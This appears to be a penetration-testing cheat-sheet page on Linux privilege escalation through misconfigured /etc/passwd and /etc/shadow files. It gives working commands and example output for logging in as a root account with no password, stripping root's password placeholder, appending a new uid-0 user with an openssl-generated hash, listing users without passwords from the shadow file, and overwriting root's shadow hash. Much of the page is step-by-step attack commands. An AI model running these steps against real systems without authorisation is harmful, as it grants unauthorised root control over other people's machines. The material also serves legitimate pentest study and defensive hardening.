# /etc/passwd & /etc/shadow

## /etc/passwd readible - root no password ?

No x ?

```shell-session
$ head -n 1 /etc/passwd

root::0:0:root:/root:/bin/bash

$ su
```

## /etc/passwd writable

### Change root line (remove x):

Before:

```shell-session
root:x:0:0:root:/root:/bin/bash
```

After:

```shell-session
root::0:0:root:/root:/bin/bash
```

{% content-ref url="capabilities" %}
[capabilities](https://0xss0rz.gitbook.io/0xss0rz/pentest/privilege-escalation/linux/capabilities)
{% endcontent-ref %}

### Create new user

1. Create a password hash: `openssl passwd -1 -salt [salt] [password]` \
   Ex: \
   `openssl passwd -1 -salt new 123` \
   `$1$new$p7ptkEKU1HnaHpRtzNizS1`
2. Add an new entry to `/etc/passwd` : \
   Ex:\
   `new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash`
3. Switch to the new user\
   `su new`\
   `password: 123`\
   `id`\
   `uid=0(new) gid=0(root) groups=0(root)`

{% embed url="<https://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/>" %}

## /etc/shadow readible

Crack hashes

{% content-ref url="../../cracking" %}
[cracking](https://0xss0rz.gitbook.io/0xss0rz/pentest/cracking)
{% endcontent-ref %}

### Users with no password

```
awk -F: '($2=="") {print $1}' /etc/shadow
```

## /etc/shadow writable

1. Generate a new password hash with a password of your choice: `mkpasswd -m sha-512 newpasswordhere`
2. Edit the `/etc/shadow` file and replace the original root user's password hash with the one you just generated.
3. Switch to the root user, using the new password:

   `su root`